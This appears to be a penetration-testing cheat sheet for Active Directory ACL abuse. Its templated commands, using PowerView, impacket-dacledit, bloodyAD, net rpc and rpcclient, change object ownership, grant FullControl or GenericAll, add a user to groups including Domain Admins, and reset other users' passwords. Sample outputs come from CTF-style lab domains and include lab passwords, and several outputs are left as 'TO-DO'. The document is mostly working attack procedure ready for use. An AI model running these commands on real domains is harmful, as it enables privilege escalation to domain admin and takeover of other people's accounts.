Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Abuse #1 : Change Owner of the Group/User
1. Powerview.py
# Password
sudo ntpdate -s <DC> && powerview '<DOMAIN>/<USER>:<PASSWORD>@<TARGET_DOMAIN>'
Sample Output:
TO-DO# NTLM
sudo ntpdate -s <DC> && powerview '<DOMAIN>/<USER>@<TARGET_DOMAIN>' -H '<HASH>'
Sample Output:
TO-DO2. Change Owner
Set-DomainObjectOwner -TargetIdentity '<TARGET_IDENTITY>' -PrincipalIdentity '<TARGET_USER>'
Sample Output:
TO-DO1. Import PowerView
. .\PowerView.ps1
Sample Output:
*Evil-WinRM* PS C:\Users\maria> . .\PowerView.ps1
2. Change Owner
Set-DomainObjectOwner -Identity '<TARGET_IDENTITY>' -OwnerIdentity '<TARGET_USER>'
Sample Output:
*Evil-WinRM* PS C:\Users\maria> Set-DomainObjectOwner -Identity 'DOMAIN ADMINS' -OwnerIdentity 'maria'
Abuse #2 : Add User to the Group
1. Add Full Control to the User Over the Group
# Password
sudo ntpdate -s <DC> && impacket-dacledit '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC> -principal '<USER>' -target '<TARGET_IDENTITY>' -inheritance -action write -rights FullControl
Sample Output:
TO-DO# NTLM
sudo ntpdate -s <DC> && impacket-dacledit '<DOMAIN>/<USER>' -hashes ':<HASH>' -dc-ip <DC> -principal '<USER>' -target '<TARGET_IDENTITY>' -inheritance -action write -rights FullControl
Sample Output:
TO-DO# Kerberos
sudo ntpdate -s <DC> && impacket-dacledit -k '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC> -principal '<USER>' -target '<TARGET_IDENTITY>' -inheritance -action write -rights FullControl
Sample Output:
$ sudo ntpdate -s dc.absolute.htb && impacket-dacledit -k 'absolute.htb/m.lovegod:AbsoluteLDAP2022!' -dc-ip dc.absolute.htb -principal 'm.lovegod' -target 'NETWORK AUDIT' -inheritance -action write -rights FullControl
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20240924-021507.bak
[*] DACL modified successfully!
# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> add genericAll '<TARGET_IDENTITY>' '<USER>'
Sample Output:
TO-DO# NTLM
bloodyAD -d <DOMAIN> -u '<USER>' -P ':<HASH>' -f rc4 --host <DC> add genericAll '<TARGET_IDENTITY>' '<USER>'
Sample Output:
TO-DO# Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --host <DC> add genericAll '<TARGET_IDENTITY>' '<USER>'
Sample Output:
$ bloodyAD -d absolute.htb -u 'm.lovegod' -p 'AbsoluteLDAP2022!' -k --host dc.absolute.htb add genericAll 'NETWORK AUDIT' 'm.lovegod'
[+] m.lovegod has now GenericAll on NETWORK AUDIT
# Password
sudo ntpdate -s <DC> && powerview '<DOMAIN>/<USER>:<PASSWORD>@<TARGET_DOMAIN>'
Sample Output:
TO-DO# NTLM
sudo ntpdate -s <DC> && powerview '<DOMAIN>/<USER>@<TARGET_DOMAIN>' -H '<HASH>'
Sample Output:
TO-DOAdd-DomainObjectAcl -TargetIdentity '<TARGET_IDENTITY>' -PrincipalIdentity '<USER>' -Rights fullcontrol
Sample Output:
TO-DO2. Add User to the Group
# Request a TGT
sudo ntpdate -s <DC> && impacket-getTGT '<DOMAIN>/<USER>'
Sample Output:
$ sudo ntpdate -s dc.absolute.htb && impacket-getTGT 'absolute.htb/m.lovegod'
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Saving ticket in m.lovegod.ccache
export KRB5CCNAME=<USER>.ccache
Sample Output:
$ export KRB5CCNAME=m.lovegod.ccache
sudo ntpdate -s <DC> && net rpc group addmem '<GROUP>' '<USER>' -U '<USER>' --use-kerberos=required -S <DC>
Sample Output:
$ sudo ntpdate -s dc.absolute.htb && net rpc group addmem 'NETWORK AUDIT' 'm.lovegod' -U 'm.lovegod' --use-kerberos=required -S dc.absolute.htb
Password for [WORKGROUP\m.lovegod]:
# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> add groupMember '<GROUP>' '<USER>'
Sample Output:
TO-DO# NTLM
bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> add groupMember '<GROUP>' '<USER>'
Sample Output:
TO-DO# Kerberos
bloodyAD -k -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> add groupMember '<GROUP>' '<USER>'
Sample Output:
$ bloodyAD -k -d absolute.htb -u 'm.lovegod' -p 'AbsoluteLDAP2022!' --host dc.absolute.htb add groupMember 'NETWORK AUDIT' 'm.lovegod'
[+] m.lovegod added to NETWORK AUDIT
Add-DomainGroupMember -Identity '<GROUP>' -Members '<USER>'
Sample Output:
TO-DO3. Check
sudo ntpdate -s <DC> && net rpc group members '<GROUP>' -U '<USER>' --use-kerberos=required -S <DC>
Sample Output:
$ sudo ntpdate -s dc.absolute.htb && net rpc group members 'NETWORK AUDIT' -U 'm.lovegod' --use-kerberos=required -S dc.absolute.htb
Password for [WORKGROUP\m.lovegod]:
absolute\m.lovegod
absolute\svc_audit
Get-DomainGroupMember -Identity '<GROUP>'
Sample Output:
TO-DO1. Import PowerView.ps1
. .\PowerView.ps1
Sample Output:
*Evil-WinRM* PS C:\Users\maria> . .\PowerView.ps1
2. Create a Cred Object (runas) [optional]
$username = '<DOMAIN>\<USER>'
Sample Output:
TO-DO$password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
Sample Output:
TO-DO$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $password
Sample Output:
TO-DO3. Add User to the Group
Add-DomainObjectAcl -TargetIdentity '<GROUP>' -PrincipalIdentity '<USER>' -Rights All -DomainController <DC> -Credential $cred
Sample Output:
*Evil-WinRM* PS C:\Users\maria> Add-DomainObjectAcl -TargetIdentity 'DOMAIN ADMINS' -PrincipalIdentity 'maria' -Rights All -DomainController jenkins.object.local
Add-DomainGroupMember -Identity '<GROUP>' -Members '<USER>' -Credential $cred
Sample Output:
*Evil-WinRM* PS C:\Users\maria> Add-DomainGroupMember -Identity 'Domain Admins' -Members 'maria'
4. Check
Get-DomainGroupMember -Identity '<GROUP>' -Domain <DOMAIN> -DomainController <DC> -Credential $cred | fl MemberName
Sample Output:
*Evil-WinRM* PS C:\Users\maria> Get-DomainGroupMember -Identity 'DOMAIN ADMINS' -Domain object.local -DomainController jenkins.object.local | fl MemberName
MemberName : maria
MemberName : Administrator
# Or
net user <USER>
Sample Output:
*Evil-WinRM* PS C:\Users\maria> net user maria
User name maria
Full Name maria garcia
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/21/2021 9:16:33 PM
Password expires Never
Password changeable 10/22/2021 9:16:33 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 9/23/2024 2:24:00 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Admins *Domain Users
The command completed successfully.
# Exit current sessions or re-login
whoami /groups
Sample Output:
*Evil-WinRM* PS C:\Users\maria> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================= ================ ============================================= ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
OBJECT\Domain Admins Group S-1-5-21-4088429403-1159899800-2753317549-512 Mandatory group, Enabled by default, Enabled group
OBJECT\Denied RODC Password Replication Group Alias S-1-5-21-4088429403-1159899800-2753317549-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Abuse #3 : Change Target User Password (From Linux)
bloodyAD -d <DOMAIN> -u <USER> -p '<PASSWORD>' --host <DC> set password '<TARGET_USER>' '<NEW_PASSWORD>'
Sample Output:
$ bloodyAD -d object.local -u oliver -p 'c1cdfun_d2434' --host jenkins.object.local set password smith 'Test1234'
[+] Password changed successfully!
Ref: bloodyAD
rpcclient -U '<DOMAIN>/<USER>%<PASSWORD>' <TARGET> -c 'setuserinfo2 <TARGET_USER> 23 <NEW_PASSWORD>'
Sample Output:
$ rpcclient -U 'object.local/oliver%c1cdfun_d2434' 10.10.11.132 -c 'setuserinfo2 smith 23 Test1234'
Abuse #3 : Change Target User Password (From Windows)
1. Import PowerView
. .\PowerView.ps1
Sample Output:
*Evil-WinRM* PS C:\programdata> . .\PowerView.ps1
2. Create a Cred Object (runas) [optional]
$username = '<DOMAIN>\<USER>'
Sample Output:
TO-DO$password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
Sample Output:
TO-DO$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $password
Sample Output:
TO-DO3. Change Target User Password
$password = ConvertTo-SecureString '<NEW_PASSWORD>' -AsPlainText -Force
Sample Output:
*Evil-WinRM* PS C:\programdata> $password = ConvertTo-SecureString 'Test1234' -AsPlainText -Force
Set-DomainUserPassword -Identity <TARGET_USER> -AccountPassword $password -Credential $Cred
Sample Output:
*Evil-WinRM* PS C:\programdata> Set-DomainUserPassword -Identity gibdeon -AccountPassword $password